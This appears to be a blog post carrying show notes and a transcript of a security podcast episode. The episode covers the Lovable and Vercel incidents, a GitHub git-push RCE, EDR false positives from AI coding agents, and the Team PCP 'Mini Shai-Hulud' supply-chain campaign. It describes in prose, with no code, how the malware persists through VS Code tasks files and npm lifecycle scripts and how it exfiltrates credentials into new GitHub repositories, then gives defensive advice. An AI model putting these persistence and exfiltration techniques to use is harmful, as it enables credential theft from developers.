BLOG

The OpenSourceMalware Show #2

Lovable and Vercel security incidents, a crazy git push RCE exploit, EDR vs AI agents, and the Mini-Shai-Hulud attack

By cb482791-4ef1-4762-96ad-b0ca4bdd538e ·

The OpenSourceMalware Show #2

The OpenSourceMalware Show is available on YouTube, LinkedIn, and as a podcast.

In this episode, we covered:
Lovable and Vercel incident response failures: Two AI-native platforms had significant security incidents in recent weeks, and both initially responded by minimizing the severity. We break down why Lovable’s regression exposed source code and full chat history to any free account holder (the mother of all IDORs), why Vercel’s response left paying customers without a single actionable mitigation step, and what good incident response communication actually looks like.

GitHub RCE via git push: A remote code execution vulnerability sitting in GitHub’s codebase for over a decade allowed arbitrary code to be passed and executed via the -o option on a git push. We discuss why this happened, why it is not entirely surprising given Git’s design history, and what it means for the ecosystem.

EDR vs. AI coding agents: Paul’s EDR flagged his own development environment as infected while he was refactoring a library with Claude. We unpack why AI agents operating at non-human speed trigger the same behavioral signatures as ransomware, and why this is going to become a bigger problem as agentic coding workflows become the norm.

Mini Shai Halud by Team PCP: Team PCP’s latest campaign compromised the Lightning Python package (15 million downloads per week) and the Intercom npm client (370,000 downloads per week), among others. We cover what makes this campaign notable: Team PCP has adopted the VS Code tasks file persistence technique previously seen only in DPRK-linked campaigns like TasksJacker and Pollen Rider. We also discuss what over 2,000 exfiltration repositories on GitHub mean for affected developers and organizations, and what you should be doing right now if you are worried you are affected.

Episode Resources

AI Full-Stack Development: The Anti-Patterns Rise Against Us - Part 1
Our research on some security anti-patterns we discovered when auditing how AI tools write code

Mini Shai-Hulud Borrowed Its Best Trick From PolinRider
An analysis of the TeamPCP campaign “mini Shai Hulud, including details on the trick they borrowed from North Korean campaigns like PolinRider and Contagious Interview

Renovate & Dependabot: The New Malware Delivery System
A GitGuardian blog about the way these tools can accidentally auto-install malware.

[00:00:00] Jenn Gile: We’re here on Thursday, April 30th to talk a bit about what’s in the news, what’s been on our minds. Spoiler, we’re gonna be talking about the nasty campaign that’s been going on for the last couple days by Team PCP called Mini Shai Halud.

Vercel and Lovable Security Incidents

[00:00:47] Jenn Gile: So let’s start off quickly with a little lightning round of news. In the last couple weeks, there were some major security incidents with Vercel and Lovable. We’re fans of those platforms, we know people at those companies. We’re not here to throw rocks, but at the same time, we don’t necessarily feel like the security announcements went the way that we would wanna see them. Paul, why don’t you start and share your thoughts?

[00:01:00] Paul McCarty: Yeah, I think that while we’re fans of those platforms and we use some of these platforms, one of the things that we saw with both the Lovable and the Vercel announcements was an initial kind of defensive way of responding to it. Like, “no, there’s nothing to see here.”

[00:01:15] Jenn Gile: Nothing to see here. Move on, folks.

[00:01:18] Paul McCarty: And then in both cases -- so the Lovable thing wasn’t technically a breach per se. Basically what they did is they regressed something that had been fixed in early February. Something they’d fixed earlier accidentally got re-regressed. They didn’t catch that. And then it opened up the ability for people with free accounts to be able to see both the source code and the chat history for anybody on the platform. That’s a pretty huge, glaring problem. And Lovable’s combativeness and hubris in their tweets and their responses just did not sit well with me.

[00:02:00] Paul McCarty: And even in the last tweet, which I posted on LinkedIn, they said, “Let’s be clear, this is not a data breach.” Well, you’re being kind of wishy-washy with your words there. This is like the mother of all IDORs, right? Where you can basically see the source code, the core intellectual property, and the chat history where you’re dropping API keys. And then you layer on top of that, what you and I are going to be talking about next week -- where Lovable and many of these AI platforms are encouraging people using them to drop API keys and credentials into the chat.

[00:02:45] Paul McCarty: Now you have a problem where the chats are visible to anybody in the world, and you’ve been dropping all these things in there because even if you tell it not to, it still prompts you to do these things. And for Vercel, the biggest issue I had as a Vercel customer is they did not produce any actionable mitigation steps. None. Zero.

[00:03:00] Paul McCarty: I had to basically write a document, which is on the OpenSourceMalware GitHub repo, which has been very popular. And I had people inside of Vercel reaching out to me saying, “Thank you for creating this. This is good.” And that was really frustrating as a paying Vercel customer -- not to have remediation advice.

[00:03:30] Jenn Gile: Yeah. And that said, we’ve heard that there have been some culture changes since that incident. I’ll go ahead and pop the incident response repo that you made into the chat. Meanwhile, let’s move on to our next topic, because we said lightning.

GitHub RCE Vulnerability

[00:03:50] Jenn Gile: So let’s talk about the GitHub RCE that came out. Was it this week? A lot has happened this week.

[00:04:00] Paul McCarty: Yeah. So basically this is crazy. When I read this, I thought for sure this can’t possibly be true. But basically what happened is that sitting inside of the GitHub codebase for over a decade, you could pass a dash-O option when you do a git push. So this is first a Git thing that GitHub themselves then interpreted poorly. Git itself is not secure by design -- Linus wrote it and didn’t add authentication. And so the fact that we’re then taking anything you pass with dash-O into GitHub and then executing it -- it’s remote code execution. You could pass it anything and it would run.

[00:04:45] Paul McCarty: It’s not great.

[00:04:50] Jenn Gile: No. Horrible.

EDR vs. AI Coding Agents

[00:05:00] Jenn Gile: Alright. And then third -- maybe this is the hot take of the week. We’re seeing a trend where EDR is becoming the enemy of coding agents. This is a little bit wild how we came to this conclusion. It was through a personal experience. I think you and I might have actually been chatting when it happened. You said, “Oh no, just got a pop-up from our EDR -- we won’t say who it is -- that you’ve been compromised.” You looked into it and it turned out, thank goodness, not compromised. False alarm. But this connects to behaviors that EDRs look for that, in the past, would have been legitimate signals that something malicious was happening, but in the age of AI, is not a signal. And that was: changes happening not at the speed of human action. Paul, talk for another minute about what happened and why you think EDR is having an issue here.

[00:06:00] Paul McCarty: Yeah, and I wanna expand on this in future episodes. But basically what it comes down to -- you said it pretty succinctly -- I was working with Claude, refactoring a library. I was editing files myself manually in Vim, and Claude was editing some of these files too. This wasn’t malware analysis on my laptop. This was a library we’re writing as part of the OpenSourceMalware platform, and that library has to do with de-obfuscating code -- de-obfuscating, not obfuscating.

[00:06:45] Paul McCarty: What happened is the EDR put together these actions -- the fact that Claude was moving at non-human speed, making all these changes really quickly, renaming files and changing files. Which looks kind of like what happens when ransomware hits.

[00:07:00] Paul McCarty: But there was also this obfuscation factor. When we went and looked at the logs later, it was talking about obfuscated files. We weren’t obfuscating files in that codebase -- we were doing the opposite. But the EDR thought we were. So it throws up this huge screen that says “infected” and quarantines the library I’m working on, which stops my ability to actually do it.

[00:07:30] Paul McCarty: I think this is gonna become a bigger issue. In the same way that Git and GitHub are not cut out for the speed and scale of iterations for git commits, EDR now with agents running on your machine that move at agent speed -- it doesn’t look like a human, and yet they’re built to detect things that are non-human.

[00:08:00] Jenn Gile: Yeah, absolutely. TLDR: EDR needs better context so that typical AI behavior doesn’t result in a false positive. Okay. Let’s talk about the thing that every defender, incident responder, and researcher is dealing with.

Mini Shai-Halud Campaign by Team PCP

[00:08:15] Jenn Gile: I’m gonna read one of the messages we got today -- and I don’t know if you’ve seen this one, Paul, yet, but it absolutely spoke to me. I’ve had the same thought. One of our friends said, “Pack up 2026, I’m going home.” Truth. So yesterday morning, I wanna say, is when Team PCP launched their latest attack.

[00:08:45] Jenn Gile: Team PCP is a threat actor group. They’re not government affiliated. There are lots of different subgroups in it -- I’d say it’s a loose coalition of people who historically were not very savvy, but starting in March with the Trivy, Checkmarx, and LiteLLM attacks, we’ve seen them mature.

[00:09:00] Jenn Gile: And we just observed another iteration this week with their Mini Shai Halud campaign. Their name, not ours. It does have Shai Halud hallmarks, but they’re also doing something really interesting where they’re borrowing a technique from the Pollen Rider campaign, which is a North Korean threat actors campaign. We’ve got thousands of compromised repositories at this point. Most recently, the Lightning project was compromised. Paul, what were your thoughts when you first saw it?

[00:10:00] Paul McCarty: This is definitely not a nothing burger. Last time I checked, which was last night, there are -- like you said -- around 1,200 repos on GitHub. One of the Shai Halud components of this is that when it compromises a developer or a CI environment -- because it works in both -- it basically does all the info stealing, wraps it up, compresses it, and then creates a net new repository on the compromised user’s GitHub (or organization’s GitHub), and names it “a mini Shai Halud has appeared.”

[00:10:45] Jenn Gile: Yes.

[00:10:47] Paul McCarty: Which is why I made that art. Everybody is loving it.

[00:11:00] Jenn Gile: I’ll do a quick screen share because I am delighted. Your AI art skills are unparalleled, but also this one -- here’s our little baby worm with the chicken. It’s pretty cute.

[00:11:10] Paul McCarty: I like it. “Shai Halud has appeared.” So basically Team PCP’s background is that they made their mark doing cloud-native info stealing and compromise. Their background is in compromising cloud providers like AWS.

[00:11:45] Paul McCarty: Fast forward to February when they started this new campaign. They’re not DPRK -- nobody thinks they’re the original threat actors. Instead, they are this crew that has pivoted to focusing on GitHub Actions and compromising GitHub Actions in a number of ways. The inside baseball I’m hearing is that we’re gonna see some really big changes coming from GitHub because GitHub Actions is just being stretched and pushed by threat actors like Team PCP so much.

[00:12:15] Paul McCarty: But they compromise you initially in CI, and they also have all these packages they’re pushing out in both npm and PyPI. Lightning is a package used, unfortunately, in a lot of AI tech stacks. It’s downloaded 15 million times a week -- not a year. Very popular. On the same day, the Intercom client npm package, which is downloaded 370,000 times a week, was also compromised.

[00:12:55] Paul McCarty: But what’s unique about this Mini Shai Halud campaign is that they’ve taken what OpenSourceMalware has done all this research around -- starting way back at the beginning of 2026 around DPRK, specifically DPRK evolving the Contagious Interview campaigns to now be proactive.

[00:13:20] Paul McCarty: So instead of only waiting to social engineer people, they now proactively attack people, or use existing compromise from people who were earlier compromised in these Contagious Interview fake-recruiter campaigns. They get persistence on developer laptops or in CI, and they do onward stuff -- they add things to repos and whatnot.

[00:13:45] Paul McCarty: But they’re using one technique as the core persistence and infection vector: VS Code tasks files. This was something that only the TasksJacker and Pollen Rider campaigns were doing, evolving out of Contagious Interview -- the same subgroups inside of the Lazarus Group in North Korea. Now Team PCP, who is not North Korean, is using this technique because it’s such an effective persistence mechanism.

[00:14:10] Paul McCarty: Whoever at Microsoft thought it was a good idea to create a file that adds persistence every single time code is opened in a folder -- because that’s what they’re doing: using a parameter inside of the VS Code tasks file to say “anytime you open something inside this folder.” So anytime you open any piece of source code in VS Code from that affected repository, it then compromises you.

[00:14:45] Paul McCarty: That’s why you now see so many threat actor groups moving to this singular threat vector.

[00:14:55] Jenn Gile: Yeah. And last week we talked about lifecycle scripts in npm. This is, for all intents and purposes, the exact same playbook -- different ecosystem, but you download the file, you don’t have to install it. These lifecycle scripts run automatically, and voila, they own your machine.

Lightning Package Compromise

[00:15:10] Jenn Gile: I am screen sharing right now, so anyone listening on the podcast will have to pop over into YouTube or LinkedIn to see the visual. But this is a threat graph visualization of the Lightning compromise. What we have here is the Lightning package and several indicators of compromise associated with it -- this is the infrastructure used to deliver this malware. We have three URLs, we have hashes, we have IP addresses. One of these is connected to maybe 10 or 11 other packages, other plugins. You can see with these types of campaigns, the breadth and impact of them when they’re using infrastructure for multiple things.

[00:16:00] Paul McCarty: Yeah, 100%. And as you can see there, they’re affecting both PyPI packages and npm, which we mentioned earlier. We’re seeing this across the threat landscape right now where bad guys, because they have access to agents like Claude and Codex, can take existing payloads that work in JavaScript and make them work in Python or Rust.

[00:16:20] Paul McCarty: For example, we’re seeing a lot of campaigns right now where bad guys are publishing Rust libraries, especially targeting the crypto ecosystem, but also using npm or Python libraries to attack on different flanks.

[00:16:50] Paul McCarty: In this case, most of these npm packages -- and Python packages in their own way -- have a lifecycle script added that runs a setup.js file automatically after you install the npm package. That sets up a custom Bun environment, and then it runs a second file -- in the latest iteration, something like router-setup.js. That file is the payload: over 11 megabytes, compressed and obfuscated JavaScript.

[00:17:20] Paul McCarty: That payload is pretty gnarly. It’s an infostealer, but it also adds persistence across all your git repos and finds all the places to put things in for Cursor and VS Code. From that point on, once that runs, they have persistence on your machine. This is how Team PCP and DPRK separately can maintain persistence on developer machines.

[00:17:55] Paul McCarty: And we need to be talking about this more because -- Jenn, you haven’t heard this yet -- I just got hit up by another researcher.

[00:17:58] Jenn Gile: Oh no.

[00:18:00] Paul McCarty: He’s telling me he’s found an iteration on Pollen Rider -- I have not verified this yet -- but he’s saying he’s found an iteration that is hundreds of thousands of affected users rather than the around 2,500 that we have right now inside our database. So I need to go look into that.

[00:18:20] Paul McCarty: But this is a huge issue because they are maintaining persistence on these developer machines and then doing bad stuff and stealing credentials. This is how this keeps growing and growing and growing.

[00:18:40] Jenn Gile: Yeah. The repositories affected by Mini Shai Halud are in the over 2,000 range at this point. Let me sort by -- most forks is probably a better way to look at it.

[00:19:00] Paul McCarty: And you’re gonna have security researchers also playing with this too. There’s all this gray area that happens after these where some subset of those git repos are gonna be either legitimate researchers trying to figure out how it works -- but also wannabe bad guys taking the functionality and trying to create their own version of it.

[00:19:25] Paul McCarty: But yeah, around 2,000 or more than 2,000. And basically what those repos are -- somebody was compromised, all their stolen data was wrapped up, compressed, encrypted, and stored inside a net new GitHub repo. So people need to be looking for these GitHub repos inside their personal GitHub environment and their GitHub organizations.

Defensive Actions and Mitigations

[00:20:00] Jenn Gile: Yeah, let’s talk actions. Because undoubtedly there are a lot of people affected by this. And if we can learn anything from what we saw last year with the original Shai Halud campaign, waves one and two, it’s that credentials leaked in these repositories -- similar pattern again, lots of files pushed public -- were not getting rotated quickly enough, or at all perhaps.

[00:20:25] Jenn Gile: I’m not sure as an industry that we’ve learned from that. A lot of security professionals will say they don’t necessarily have good insight into where credentials are living in their organization. If that’s a problem for your organization, that’s something I would personally prioritize.

[00:20:45] Jenn Gile: These are not just targeting tech companies. The data we saw last year shows only a little over half of the Shai Halud 2.0 wave victims were tech companies. And it’s not only targeting large organizations -- lots of small companies are going to be hit by this.

[00:21:10] Jenn Gile: Some things you can be doing: I was actually chatting with the GitGuardian folks yesterday, and they shared a blog showing research they did around using tools like Dependabot and Renovatebot to auto-upgrade. They found that those tools -- or rather the configuration of those tools -- were directly responsible for auto-upgrading to malicious versions.

[00:21:40] Jenn Gile: So look at your auto-upgrade policies. Pin your dependencies. Enforce cool-down periods. I know this is not the most exciting stuff, but it works. It will go a long way toward making sure you’re not the next victim -- that your repositories don’t go public -- and then figure out how to get a better handle on your secrets location and sprawl so you can quickly rotate and kill them off in these circumstances.

[00:22:05] Jenn Gile: Being able to respond quickly is key. What else would you add, Paul?

[00:22:10] Paul McCarty: Yeah. A lot of the focus in the industry historically has been on keeping that stuff out of CI. And yes, you wanna run credential scanners locally too. But I want to be very clear: bad guys now -- both Team PCP, DPRK, and others -- are targeting the tools on your developer’s laptop, and there are enormous amounts of credentials there.

[00:22:45] Paul McCarty: In this particular case, these packages -- both Python and JavaScript -- are finding Cursor and Claude and other tools specifically on development laptops, compromising those, and stealing data out of them. And the reality is that most people don’t harden their Claude setup.

[00:23:10] Paul McCarty: For example, Trail of Bits -- Dan Guido and his team -- have created a really great resource on GitHub and the Trail of Bits GitHub organization: how to harden your Claude, basically creating CLAUDE.md files and other files to protect credentials and do other kinds of hardening.

[00:23:35] Paul McCarty: How many people have done that? Probably very, very few. And because of that, bad guys compromise these machines -- whether it’s a Python package, npm package, AI skills, GitHub repos, whatever -- and they’re immediately going to those places.

[00:23:55] Paul McCarty: People should be reading this and hardening their agents, but also spending time to think, “Hmm, what have I given my agents in the past?” Like, Lovable keeps prompting people to hand over their secret keys. One: they need to stop doing that. But also: you need to think about how many times you’ve given Lovable or Claude your secret keys. Those conversations are specifically being targeted by these bad guys to be exfiltrated and then used.

[00:24:25] Jenn Gile: Well, I’m gonna end us on perhaps not a high note, but at least it made me smile a little bit. Over on LinkedIn: “Hey Tom… when is it gonna stop, Paul? I’m tired of this. Paul, when is it gonna stop?”

[00:24:40] Paul McCarty: I wrote back: “I know, right?” This week has been crazy. This month has been crazy. I don’t know.

[00:24:50] Jenn Gile: Yeah.

[00:24:52] Paul McCarty: I don’t know when it stops. It doesn’t. It’s getting worse.

[00:24:58] Jenn Gile: It doesn’t. Well, hopefully we have better news to share next time, but we are at our time. Hit us up on LinkedIn, YouTube, wherever you can find us and tell us what you wanna learn about on these. We’ll continue to talk about current events and trends. And when things are not on fire like they were this week -- Freudian slip -- we will talk about more generic things you can be doing, things you need to understand.

[00:25:20] Jenn Gile: I really want to talk about interpretive language malware and how it’s different than compiled malware.

[00:25:25] Paul McCarty: Me too. That’s on my personal list to get to.

[00:25:28] Jenn Gile: Yeah. So what do you want to hear about? See ya.

[00:25:32] Paul McCarty: See everybody. Take care.